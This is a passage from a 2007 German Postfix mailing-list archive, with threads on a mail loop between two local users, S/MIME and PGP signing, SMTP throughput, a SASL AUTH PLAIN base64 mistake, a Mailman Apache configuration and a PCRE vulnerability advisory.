Befehl "mailq" gezeigt. Das zeigt die Mail in Text: server1:/etc/postfix# postcat -q 5E1891CDFF *** ENVELOPE RECORDS active/5E1891CDFF *** message_size: 405 261 1 0 content_filter: smtp-amavis:[127.0.0.1]:10024 message_arrival_time: Mon Nov 5 07:31:47 2007 create_time: Mon Nov 5 07:52:19 2007 named_attribute: rewrite_context=local sender_fullname: Max Muxe sender: max at server1.office warning_message_time: Mon Nov 5 11:31:47 2007 original_recipient: max.muxe at server1.office recipient: max.muxe at server1.office *** MESSAGE CONTENTS active/5E1891CDFF *** Received: by server1 (Postfix, from userid 1002) id 5E1891CDFF; Mon, 5 Nov 2007 07:31:47 +0100 (CET) Delivered-To: unknown Received: from mail.hosting-agency.de (194.145.226.10) by localhost with IMAP4; 05 Nov 2007 06:31:47 -0000 Message-Id: <20071105065219.5E1891CDFF at server1> Date: Mon, 5 Nov 2007 07:31:47 +0100 (CET) From: max at server1.office (Max Muxe) To: undisclosed-recipients:; 4 *** HEADER EXTRACTED active/5E1891CDFF *** *** MESSAGE FILE END active/5E1891CDFF *** > -- > Sandy Ich danke Dir schon mal im Voraus! M. From p at state-of-mind.de Mon Nov 5 20:46:43 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Mon, 5 Nov 2007 20:46:43 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <472F52D4.7060200@marcomartinez.de> References: <472CC915.3020708@marcomartinez.de> <472CD461.3090803@lab.swapon.de> <472DF25C.1090800@marcomartinez.de> <20071104173934.GC10692@state-of-mind.de> <472E0D22.4050300@marcomartinez.de> <20071104183929.GA11713@state-of-mind.de> <472E1879.6030002@marcomartinez.de> <20071104210501.GA13691@state-of-mind.de> <472F52D4.7060200@marcomartinez.de> Message-ID: <20071105194643.GD2226@state-of-mind.de> * Marco Estrada Martinez : > Patrick Ben Koetter schrieb: > >* Marco Estrada Martinez : > > > >>>Nein. Deiner User schreiben ihre Mail sicherlich nicht in Postfix oder > >>>Sendmail, sondern sie nutzen Outlook oder Thunnderbird. Dort, in diesen > >>>MUA, muß die Signierung oder Authentifizierung stattfinden. > >>> > >>>Ob das dann auf einem Laptop stattfindet und ob der dann noch zusätzlich > >>>ein Postfix installiert hat, um die Mails nach > >>>TLS-Clientzertifikat-Authentifizierung über ein zentrales Gateway zu > >>>relayen, ist eine andere Sache. > >>> > >>> > >>> > >>>>mailserver (für jeden client eines) und ein zertifikat pro Person zum > >>>>digitalen unterschreiben, Oder gibt es andere Vorgehen. > >>>> > >>>> > >>>Von welcher Art Signatur sprichst Du eigentlich? Willst Du, das der > >>>Client > >>>sich mit einem TLS-Zertifikat gegenüber dem Server ausweist und das im > >>>Header vermerkt wird? > >>> > >>>Willst Du den Body der Mail signieren, damit die Urheberschaft vermerkt > >>>ist? > >>> > >>> > >>Mir wäre wichtig das der User (Person) die Mail signiert um die > >>Urheberschaft "nachzuweisen". Also deine zweite Aussage. > >> > > > >Das ist eine Aufgabe, die entweder von der Person im MUA wahrgenommen wird > >(S/MIME, PGP, GnuPG) oder zentral im Krypto-Gateway. Produkte für > >Krypto-Gateways musst Du ggf. selber recherchieren. > > > >Wenn Du im MUA signieren willst, hängt es vom Produkt ab welche > >Signatur-Methode Du nutzen kannst. Zusätzlich bringt z.B. S/MIME > >üblicherweise > >noch Kosten für Signierung der Zertifikate durch eine kommerzielle PKI mit > >sich. > > > >Welche Mailclients mußt Du denn versorgen? > > > > Hi, Eigentlich nur Thunderbird, OK könnte sein das sich darunter noch > ein Outlook befindet (zwar schwer vorstellbar ;o)) Sieh Dir das Thunderbird-Projekt "Enigmail OpenPGP" mal an. Ich denke, es hat alles was Du an Software brauchst. Für den gesamten Prozess mußt Du auch den Key-Rollout und die Publikation der Keys mit einberechnen. Außerdem, das solltest Du vor allem prüfen, solltest Du herausfinden, ob die Empfänger der Mails signierte Mails lesen können. Ein Outlook 2003 zeigt z.B. eine signierte Mail ohne Zusatzausrüstung nur als Attachment an und kann es nicht öffnen... p at rick > > THX Marco > >p at rick > > > > > > > >>THX Marco > >> > >>>Oder willst Du pro Sender eine eigene DKIM-Signatur im Header der Mail > >>>vermerken? > >>> > >>>p at rick > >>> > >>> > >>> > >>> > >>> > >>> > >>>>THX & Grüße Marco > >>>> > >>>> > >>>>>Die einzige Methode, um den Zugriff auf bestimmte Envelope-Sender > >>>>>einzuschränken ist es mit smtpd_sasl_login_maps den SASL Loginnamen > >>>>>and einen > >>>>>Envelope-Sender zu binden. > >>>>> > >>>>>TLS Zertifikate sind zwar in wenigen MUAs an eine Person bindbar, aber > >>>>>deren > >>>>>Verbreitung ist in Windows-Landschaften nicht der Regelfall. > >>>>> > >>>>>p at rick > >>>>> > >>>>> > >>>>> > >>>>> > >>>>-- > >>>>Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem > >>>>folgenden Fingerprint: > >>>> > >>>>This mail is digitally signed, it is only valid with the following > >>>>Fingerprint: > >>>> > >>>>MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C > >>>> > >>>> > >>>> > >>> > >>> > >>> > >>>>-- > >>>>_______________________________________________ > >>>>Postfixbuch-users -- http://www.postfixbuch.de > >>>>Heinlein Professional Linux Support GmbH > >>>> > >>>>Postfixbuch-users at listi.jpberlin.de > >>>>https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > >>>> > >>>> > >>> > >>> > >>-- > >>Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem > >>folgenden Fingerprint: > >> > >>This mail is digitally signed, it is only valid with the following > >>Fingerprint: > >> > >>MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C > >> > >> > > > > > > > > > >>-- > >>_______________________________________________ > >>Postfixbuch-users -- http://www.postfixbuch.de > >>Heinlein Professional Linux Support GmbH > >> > >>Postfixbuch-users at listi.jpberlin.de > >>https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > >> > > > > > > > -- > Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem > folgenden Fingerprint: > > This mail is digitally signed, it is only valid with the following > Fingerprint: > > MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From postfixbuch-users at japantest.homelinux.com Mon Nov 5 21:19:01 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Mon, 05 Nov 2007 21:19:01 +0100 Subject: [Postfixbuch-users] DINGENDE Hilfe: Mail pendelt zwischen zwei lokale User In-Reply-To: <20071105195138.hwaj208uoccg4gcs@www.hosting-agency.de> References: <472F1BEE.7000500@server1.office> <472F307E.5020009@linuxrocks.dyndns.org> <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> <472F5E50.5080102@japantest.homelinux.com> <20071105195138.hwaj208uoccg4gcs@www.hosting-agency.de> Message-ID: <472F7AB5.3000309@japantest.homelinux.com> max.muxe at maxxly.de wrote: >>> mydomain = office >>> myhostname = server1 >> keine vollständigen Namen in diesen beiden Parametern lädt zu Ärger fast ein. > Das habe ich geändert. >>> mynetworks = 192.168.121.0/24, 127.0.0.0/8 >>> myorigin = /etc/mailname >> Was steht in /etc/mailname? > server1.office Okay. Hast du einen lokalen DNS-Server? Oder wird der Name nur über /etc/hosts aufgelöst? > ein .../postfix check gibt > postsuper: warning: bogus file name: incoming/581993.10323 > postsuper: warning: bogus file name: incoming/942374.6141 > postsuper: warning: bogus file name: incoming/635110.4672 > postsuper: warning: bogus file name: incoming/695550.9678 Postfix wurde runtergefahren, während Queuefiles erzeugt wurden. > Ich kann mich erinnern, dass ich vor einigen Wochen Ärger wegen einer > Mail mit etlichen MB Attachment hatte. Ich habe daraufhin bestimmte > Mails (Spam) per Hand gelöscht. Könnte der heutige Mist aus dieser > Aktion stammen? Und wie löst man so etwas? Sollte nichts damit zu tun haben. "postsuper -p" sagt was? >> Wenn dein Maillog aufgesplittert ist in mail.err, mail.warn und mail, dann >> schau in mail.err und mail.warn nach. >> > mail.err zeigt nur sehr alte Fehler. > > mail.warn zeigt Ähnliches wie .../postfix check: > Nov 5 07:26:25 localhost postfix/postsuper[14763]: warning: bogus > file name: incoming/994901.12966 > Nov 5 07:26:25 localhost postfix/postsuper[14763]: warning: bogus > file name: incoming/831819.18403 > Nov 5 07:26:25 localhost postfix/postsuper[14763]: warning: bogus > file name: incoming/729913.11543 > Nov 5 07:26:33 localhost postfix/postsuper[14922]: fatal: invalid > directory name: - Das ist schon interessanter. Ich kann in der postconf-Ausgabe aber kein solches Verzeichnis sehen. Wie sieht die master.cf aus? > Nov 5 19:41:47 localhost postfix/postsuper[10461]: warning: bogus > file name: incoming/581993.10323 > Nov 5 19:41:47 localhost postfix/postsuper[10461]: warning: bogus > file name: incoming/942374.6141 > Nov 5 19:41:47 localhost postfix/postsuper[10461]: warning: bogus > file name: incoming/635110.4672 > Nov 5 19:41:47 localhost postfix/postsuper[10461]: warning: bogus > file name: incoming/695550.9678 Ich hoffe nicht, dass du ständig Postfix startest und stoppst?!? Ein "postfix reload" reicht in den meisten Fällen, um die Änderung der Konfiguration wirksam werden zu lassen. Läuft auch der content_filter amavisd-new? >> Schau auch nach, was in den Queuefiles steht. Du kannst sie dir mit >> "postcat -q queue-id" anzeigen. >> Die queue-id wird mit dem Befehl "mailq" gezeigt. > Das zeigt die Mail in Text: > server1:/etc/postfix# postcat -q 5E1891CDFF > *** ENVELOPE RECORDS active/5E1891CDFF *** > message_size: 405 261 1 0 > content_filter: smtp-amavis:[127.0.0.1]:10024 Das ist noch vor dem content_filter. Siehst du im Log, ob die Mails durch den content_filter gehen? -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From nighthawk at gmail.com Mon Nov 5 21:32:45 2007 From: nighthawk at gmail.com (nighthawk) Date: Mon, 5 Nov 2007 21:32:45 +0100 Subject: [Postfixbuch-users] Der smtp als Flaschenhals... In-Reply-To: <20071105182633.GA10044@mail.incertum.net> References: <20071105145232.244500@gmx.net> <472F3A50.2030606@japantest.homelinux.com> <20071105181441.GC17591@mail.incertum.net> <472F5FB5.1010207@japantest.homelinux.com> <20071105182633.GA10044@mail.incertum.net> Message-ID: <7832fd560711051232p12c26da4n11466e95731751ed@mail.gmail.com> On Nov 5, 2007 7:26 PM, Stefan Förster wrote: > * Sandy Drobic wrote: >> Mit dem Risiko, dass vielleicht nur 10 Instanzen Mails senden, wenn keine >> Mails größer als $XYZ Bytes in der Queue sind. > > *seufz* Dann hab ichs ja doch nicht verbockt gehabt, es geht nur nicht > so einfach, wie ich gehofft hatte. Case closed, Danke. Ich hatte in einem Setup lange Zeit auch nur eine DSL Leitung mit schmalem Upload über die mitunter riesige Mails gehen mußten - u.a. welche die immer zur selben Tageszeit verschickt wurden und immer ziemlich groß waren, aber eigentlich auch genau so gut später rausgehen könnten. Leider ist Leuten nicht zu vermitteln, daß Sie mit dem Mailversand bis kurz vor dem Mittagessen warten sollen - auch wenn sie nach dem Versand einer solchen Mail regelmäßig darüber klagen, daß "das Surfen so langsam ist". Daher habe ich diese Mails mit einem Policy Daemon auf HOLD gesetzt und automatisch immer um 12 Uhr und um 18 Uhr alle wartenden Mails rausgehen lassen. Das klappte ziemlich gut. Die smtpd-Instanzen für den externen Versand hatte ich sowieso auf 3 oder 5 begrenzt. Viel mehr macht bei einer derart geringen Uploadbandbreite meiner Ansicht nach auch keinen Sinn. Intern - wie hier schon vorgeschlagen - gingen die Mails über eine andere Instanz. Das sorgt nicht nur dafür, daß man das Prozesslimit getrennt steuern kann, sondern auch dafür, daß die eine Instanz nicht die andere blockieren kann, wenn mal mehr Mails rausgehen, sollen als Prozesse zur Verfügung stehen. Zudem hatte ich eine "express" Instanz durch die Mails mit einem speziellen Header geschickt wurden - ein Spezialfall bei dieser Firma: Auftragsbestätigungen mußten _sofort_ verschickt werden, alles andere durfte den geregelten Weg gehen. From armin at townux.ch Mon Nov 5 22:08:29 2007 From: armin at townux.ch (Stoffel Armin) Date: Mon, 05 Nov 2007 22:08:29 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql Message-ID: <472F864D.7030207@townux.ch> Hallo zusammen Ich versuche postfix mit sasl und mysql zu installieren. Wenn ich nun versuche über: telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 domain.ch ESMTP Postfix dann gebe ich ein: EHLO domain.ch Antwort 250-domain.ch 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-AUTH DIGEST-MD5 LOGIN PLAIN 250-AUTH=DIGEST-MD5 LOGIN PLAIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN dann: AUTH PLAIN aW5mbwBpbmZvCjXY0NTY= Anwort: 535 5.7.0 Error: authentication failed: bad protocol / cancel fehlermeldung in allmessages: Nov 5 21:38:25 domain postfix/smtpd[27219]: warning: SASL authentication failure: Can only find author/en (no password) Nov 5 21:38:25 domain postfix/smtpd[27219]: warning: localhost[127.0.0.1]: SASL PLAIN authentication failed: bad protocol / cancel Was mach ich falsch? andere logfiles? From max.muxe at maxxly.de Mon Nov 5 22:40:57 2007 From: max.muxe at maxxly.de (Max Muxe) Date: Mon, 05 Nov 2007 22:40:57 +0100 Subject: [Postfixbuch-users] DINGENDE Hilfe: Mail pendelt zwischen zwei lokale User In-Reply-To: <200711051933.25543.ml@awinkelmann.de> References: <472F1BEE.7000500@server1.office> <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> <472F5E50.5080102@japantest.homelinux.com> <200711051933.25543.ml@awinkelmann.de> Message-ID: <472F8DE9.7060108@server1.office> Lieber Andreas, liebe Sandy, Uwe, Matthias und die Anderen, Andreas Winkelmann schrieb: > On Montag, 5. November 2007, Sandy Drobic wrote: > [...] > > "Recieved: ... by localhost with IMAP4" könnte auf einen verrückt spielenden > IMAP-Client deuten. Der OP könnte mal prüfen wer User-Id 1002 auf seinem > System hat. > > # getent passwd 1002 > Das war der entscheidene Tip: Ich habe mir die Klienten angesehen und festgestellt, dass der eine die Sende-Adresse des anderen hatte. So haben die beiden Ping-Pong gespielt. Da diese Adresse kaum Mails bekommt und nur gelegentlich lokal genutzt wird, ist mir das bisher nicht aufgefallen. Also nochmals vielen Dank für die Hilfe. M. From ml at awinkelmann.de Mon Nov 5 22:41:48 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 5 Nov 2007 22:41:48 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql In-Reply-To: <472F864D.7030207@townux.ch> References: <472F864D.7030207@townux.ch> Message-ID: <200711052241.48817.ml@awinkelmann.de> On Montag, 5. November 2007, Stoffel Armin wrote: > AUTH PLAIN aW5mbwBpbmZvCjXY0NTY= > Anwort: > 535 5.7.0 Error: authentication failed: bad protocol / cancel > fehlermeldung in allmessages: > Was mach ich falsch? andere logfiles? Wenn Du Probleme damit hast diese Base64-Zeichenkette zu erzeugen, benutze am besten einen richtigen MUA zum testen. -- Andreas From armin at townux.ch Mon Nov 5 22:46:51 2007 From: armin at townux.ch (Stoffel Armin) Date: Mon, 05 Nov 2007 22:46:51 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql In-Reply-To: <200711052241.48817.ml@awinkelmann.de> References: <472F864D.7030207@townux.ch> <200711052241.48817.ml@awinkelmann.de> Message-ID: <472F8F4B.8060804@townux.ch> Hab damit kein problem: perl -MMIME::Base64 -e 'print encode_base64("user\0user\0passwort");' Andreas Winkelmann schrieb: >On Montag, 5. November 2007, Stoffel Armin wrote: > > > >>AUTH PLAIN aW5mbwBpbmZvCjXY0NTY= >>Anwort: >>535 5.7.0 Error: authentication failed: bad protocol / cancel >>fehlermeldung in allmessages: >> >> > > > >>Was mach ich falsch? andere logfiles? >> >> > >Wenn Du Probleme damit hast diese Base64-Zeichenkette zu erzeugen, benutze am >besten einen richtigen MUA zum testen. > > > From ml at awinkelmann.de Mon Nov 5 23:07:32 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 5 Nov 2007 23:07:32 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql In-Reply-To: <472F8F4B.8060804@townux.ch> References: <472F864D.7030207@townux.ch> <200711052241.48817.ml@awinkelmann.de> <472F8F4B.8060804@townux.ch> Message-ID: <200711052307.32493.ml@awinkelmann.de> On Montag, 5. November 2007, Stoffel Armin wrote: Bitte kein TOFU. > Hab damit kein problem: Scheinbar schon, "bad protocol" und sowas wie "Can only find author/en (no password)" bedeuten mit dem Base64-String stimmt was nicht. > perl -MMIME::Base64 -e 'print encode_base64("user\0user\0passwort");' Bei perl vergessen die Leute meist die Sonderbedeutung von dem @-Zeichen in der Zeichenkette. Evtl fängt das Password aber auch mit ner Zahl an. Nimm die Zeichenkette, die Du erzeugt hast, lasse sie von perl wieder dekodieren (decode_base64) und staune. > >Wenn Du Probleme damit hast diese Base64-Zeichenkette zu erzeugen, benutze > > am besten einen richtigen MUA zum testen. -- Andreas From armin at townux.ch Mon Nov 5 23:48:10 2007 From: armin at townux.ch (Stoffel Armin) Date: Mon, 05 Nov 2007 23:48:10 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql In-Reply-To: <200711052307.32493.ml@awinkelmann.de> References: <472F864D.7030207@townux.ch> <200711052241.48817.ml@awinkelmann.de> <472F8F4B.8060804@townux.ch> <200711052307.32493.ml@awinkelmann.de> Message-ID: <472F9DAA.9060106@townux.ch> Hallo sorry... du bist ein genie! hatte eine zahl als erstes zeichen! jetzt kommt ein anderer Fehler. Mal schauen ich ichs alleine finde Vielen dank!!!!!!!!!!!!!!! p.S. was meinst du mit TOFU? Andreas Winkelmann schrieb: >On Montag, 5. November 2007, Stoffel Armin wrote: > >Bitte kein TOFU. > > > >>Hab damit kein problem: >> >> > >Scheinbar schon, "bad protocol" und sowas wie "Can only find author/en (no >password)" bedeuten mit dem Base64-String stimmt was nicht. > > > >>perl -MMIME::Base64 -e 'print encode_base64("user\0user\0passwort");' >> >> > >Bei perl vergessen die Leute meist die Sonderbedeutung von dem @-Zeichen in >der Zeichenkette. Evtl fängt das Password aber auch mit ner Zahl an. > >Nimm die Zeichenkette, die Du erzeugt hast, lasse sie von perl wieder >dekodieren (decode_base64) und staune. > > > >>>Wenn Du Probleme damit hast diese Base64-Zeichenkette zu erzeugen, benutze >>>am besten einen richtigen MUA zum testen. >>> >>> > > > From driessen at fblan.de Mon Nov 5 23:50:07 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 5 Nov 2007 23:50:07 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql In-Reply-To: <472F9DAA.9060106@townux.ch> References: <472F864D.7030207@townux.ch><200711052241.48817.ml@awinkelmann.de> <472F8F4B.8060804@townux.ch><200711052307.32493.ml@awinkelmann.de> <472F9DAA.9060106@townux.ch> Message-ID: <001701c81ffe$36e3eb80$0565a8c0@uwe> http://de.wikipedia.org/wiki/TOFU Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 > -----Original Message----- > From: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users- > bounces at listi.jpberlin.de] On Behalf Of Stoffel Armin > Sent: Monday, November 05, 2007 11:48 PM > To: Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein. > Subject: Re: [Postfixbuch-users] Postfix mit sasl2 und mysql > > Hallo > > sorry... du bist ein genie! > hatte eine zahl als erstes zeichen! > jetzt kommt ein anderer Fehler. > > Mal schauen ich ichs alleine finde > > Vielen dank!!!!!!!!!!!!!!! > > p.S. was meinst du mit TOFU? > > Andreas Winkelmann schrieb: > > >On Montag, 5. November 2007, Stoffel Armin wrote: > > > >Bitte kein TOFU. > > > > > > > >>Hab damit kein problem: > >> > >> > > > >Scheinbar schon, "bad protocol" und sowas wie "Can only find author/en (no > >password)" bedeuten mit dem Base64-String stimmt was nicht. > > > > > > > >>perl -MMIME::Base64 -e 'print encode_base64("user\0user\0passwort");' > >> > >> > > > >Bei perl vergessen die Leute meist die Sonderbedeutung von dem @-Zeichen in > >der Zeichenkette. Evtl fängt das Password aber auch mit ner Zahl an. > > > >Nimm die Zeichenkette, die Du erzeugt hast, lasse sie von perl wieder > >dekodieren (decode_base64) und staune. > > > > > > > >>>Wenn Du Probleme damit hast diese Base64-Zeichenkette zu erzeugen, benutze > >>>am besten einen richtigen MUA zum testen. > >>> > >>> > > > > > > > > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From rainer.frey at inxmail.de Tue Nov 6 08:27:10 2007 From: rainer.frey at inxmail.de (Rainer Frey) Date: Tue, 6 Nov 2007 08:27:10 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <472F5086.5090006@marcomartinez.de> References: <472CC915.3020708@marcomartinez.de> <200711051435.06929.rainer.frey@inxmail.de> <472F5086.5090006@marcomartinez.de> Message-ID: <200711060827.10514.rainer.frey@inxmail.de> On Monday 05 November 2007 18:19:02 Marco Estrada Martinez wrote: > Rainer Frey schrieb: > > Was meinst du "Mit Client-Zertifikaten eingerichtet"? check_ccert_access > > verwendet, oder was? > > Ja, genau das, aber mir ist jetzt klar geworden das ich um den client > gegenüvber dem Server auszuweisen für jeden client eins brauch. Danke > schonmal dafür. Es würde also bedeuten ... > Client 1: ZertifikatA -> Ausweisung client <->server > ZertifikatB -> Digitale Unterschrift > > Client : ZertifikatC -> Ausweisung client <->server > ZertifikatB -> Digitale Unterschrift > > Oder? Nein, nicht unbedingt. Du kannst prinzipiell *ein* Zertifikat in mehreren Clients sowohl für digitale Signatur als auch für Authentifizierung ggü. Server verwenden. Ich habe das schon gemacht. Die Unterstützung der Clients für die Server-Authentifizierung ist allerdings dünn, und ich meine mich an einen Bug mit Thunderbird 1.5 zu erinnern. Aber es geht. Mein Chef, und ab und zu auch ich, verwenden das. Wenn du das Problem so lösen *willst* (organisatorische Gründe könnten für deine obige Variante sprechen), beantworte doch mal meine Detailfragen in meiner vorherigen Mail. > > Gruß > > Rainer Frey > > THX und liebe Grüße Marco Gruß Rainer -- Inxmail GmbH www.inxmail.de Handelsregister Freiburg, HRB 5870 Ust.-ID: DE198371679 Geschäftsleitung Martin Bucher, Peter Ziras From sven at root2.schroederhost.de Tue Nov 6 11:48:35 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Tue, 06 Nov 2007 11:48:35 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?Mailman_und_Oberfl=E4che?= Message-ID: <47304683.4050009@root2.schroederhost.de> Hi! Ich versuche jetzt seid Stunden Mailman auf einer V-Domain zum laufen zu bringen. Dazu hatte ich das Config-Beispiel für Apache 2 benutzt: ServerName lists1.server.local DocumentRoot /var/www/lists ErrorLog /var/log/apache2/lists1-error.log CustomLog /var/log/apache2/lists1-access.log combined Options Indexes FollowSymLinks AllowOverride None Alias /pipermail/ /var/lib/mailman/archives/public/ Alias /images/mailman/ /usr/share/images/mailman/ ScriptAlias /admin /usr/lib/cgi-bin/mailman/admin ScriptAlias /admindb /usr/lib/cgi-bin/mailman/admindb ScriptAlias /confirm /usr/lib/cgi-bin/mailman/confirm ScriptAlias /create /usr/lib/cgi-bin/mailman/create ScriptAlias /edithtml /usr/lib/cgi-bin/mailman/edithtml ScriptAlias /listinfo /usr/lib/cgi-bin/mailman/listinfo ScriptAlias /options /usr/lib/cgi-bin/mailman/options ScriptAlias /private /usr/lib/cgi-bin/mailman/private ScriptAlias /rmlist /usr/lib/cgi-bin/mailman/rmlist ScriptAlias /roster /usr/lib/cgi-bin/mailman/roster ScriptAlias /subscribe /usr/lib/cgi-bin/mailman/subscribe ScriptAlias /mailman/ /usr/lib/cgi-bin/mailman/ Ist da irgendwo ein Fehler drin? From christian at cg-networks.de Tue Nov 6 14:06:30 2007 From: christian at cg-networks.de (Christian Garling) Date: Tue, 6 Nov 2007 14:06:30 +0100 (CET) Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_und_Oberfl=E4che?= In-Reply-To: <47304683.4050009@root2.schroederhost.de> References: <47304683.4050009@root2.schroederhost.de> Message-ID: <32059.213.160.27.226.1194354390.squirrel@www.cg-networks.de> > Hi! > > Ich versuche jetzt seid Stunden Mailman auf einer V-Domain zum laufen zu > bringen. > Dazu hatte ich das Config-Beispiel für Apache 2 benutzt: > > > ServerName lists1.server.local > DocumentRoot /var/www/lists > ErrorLog /var/log/apache2/lists1-error.log > CustomLog /var/log/apache2/lists1-access.log combined > > > Options Indexes FollowSymLinks > AllowOverride None > > > Alias /pipermail/ /var/lib/mailman/archives/public/ > Alias /images/mailman/ /usr/share/images/mailman/ > ScriptAlias /admin /usr/lib/cgi-bin/mailman/admin > ScriptAlias /admindb /usr/lib/cgi-bin/mailman/admindb > ScriptAlias /confirm /usr/lib/cgi-bin/mailman/confirm > ScriptAlias /create /usr/lib/cgi-bin/mailman/create > ScriptAlias /edithtml /usr/lib/cgi-bin/mailman/edithtml > ScriptAlias /listinfo /usr/lib/cgi-bin/mailman/listinfo > ScriptAlias /options /usr/lib/cgi-bin/mailman/options > ScriptAlias /private /usr/lib/cgi-bin/mailman/private > ScriptAlias /rmlist /usr/lib/cgi-bin/mailman/rmlist > ScriptAlias /roster /usr/lib/cgi-bin/mailman/roster > ScriptAlias /subscribe /usr/lib/cgi-bin/mailman/subscribe > ScriptAlias /mailman/ /usr/lib/cgi-bin/mailman/ > > > Ist da irgendwo ein Fehler drin? Vielleicht sagst du erstmal was nicht funktioniert... > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > From nospam at thoma.cc Tue Nov 6 14:09:13 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Tue, 06 Nov 2007 14:09:13 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_und_Oberfl=E4che?= In-Reply-To: <47304683.4050009@root2.schroederhost.de> References: <47304683.4050009@root2.schroederhost.de> Message-ID: <47306779.2040507@thoma.cc> Sven Schmidt schrieb: > Hi! > > Ich versuche jetzt seid Stunden Mailman auf einer V-Domain zum laufen zu > bringen. > Dazu hatte ich das Config-Beispiel für Apache 2 benutzt: > > > ServerName lists1.server.local > DocumentRoot /var/www/lists > ErrorLog /var/log/apache2/lists1-error.log > CustomLog /var/log/apache2/lists1-access.log combined > > > Options Indexes FollowSymLinks > AllowOverride None > > > Alias /pipermail/ /var/lib/mailman/archives/public/ > Alias /images/mailman/ /usr/share/images/mailman/ > ScriptAlias /admin /usr/lib/cgi-bin/mailman/admin > ScriptAlias /admindb /usr/lib/cgi-bin/mailman/admindb > ScriptAlias /confirm /usr/lib/cgi-bin/mailman/confirm > ScriptAlias /create /usr/lib/cgi-bin/mailman/create > ScriptAlias /edithtml /usr/lib/cgi-bin/mailman/edithtml > ScriptAlias /listinfo /usr/lib/cgi-bin/mailman/listinfo > ScriptAlias /options /usr/lib/cgi-bin/mailman/options > ScriptAlias /private /usr/lib/cgi-bin/mailman/private > ScriptAlias /rmlist /usr/lib/cgi-bin/mailman/rmlist > ScriptAlias /roster /usr/lib/cgi-bin/mailman/roster > ScriptAlias /subscribe /usr/lib/cgi-bin/mailman/subscribe > ScriptAlias /mailman/ /usr/lib/cgi-bin/mailman/ > > > Ist da irgendwo ein Fehler drin? > sind die scripts für den user mit dem apache betrieben wird ausführbar bzw. gehören die scripts dem user ? z.b. www-data ?? ist der parameter NameVirtualHost gesetzt wenn ja was steht da drin ? was gibt apache2 -S aus ? Gruß Maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From p at state-of-mind.de Tue Nov 6 14:16:27 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Tue, 6 Nov 2007 14:16:27 +0100 Subject: [Postfixbuch-users] Achtung: Schwachstellen in PCRE Message-ID: <20071106131627.GB22556@state-of-mind.de> Heise berichtet in "Schwachstellen in Perl und Regular-Expressions-Bibliothek" , die "Regular Expression Engine der Skriptsprache Perl weist eine Schwachstelle auf, die zum Absturz einer damit geschriebenen Anwendung oder sogar zum Einschleusen von Code führen kann." Postfix nutzt die pcre-Library, für den pcre-Map-Type, um damit z.B. header- oder body-checks durchzuführen. Woran erkennt man, ob Postfix die pcre-Library eingebunden hat? Der Aufruf von 'postconf -m' listet den pcre-Map-Type, wenn die pcre-Library eingebunden ist: $ postconf -m ... pcre ... Was tun? Update über Distribution durchführen oder die (offizielle) Version 7.4 auf laden, bauen und installieren. p at rick -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From p at state-of-mind.de Tue Nov 6 14:22:31 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Tue, 6 Nov 2007 14:22:31 +0100 Subject: [Postfixbuch-users] NACHTRAG: Re: Achtung: Schwachstellen in PCRE In-Reply-To: <20071106131627.GB22556@state-of-mind.de> References: <20071106131627.GB22556@state-of-mind.de> Message-ID: <20071106132231.GA23107@state-of-mind.de> 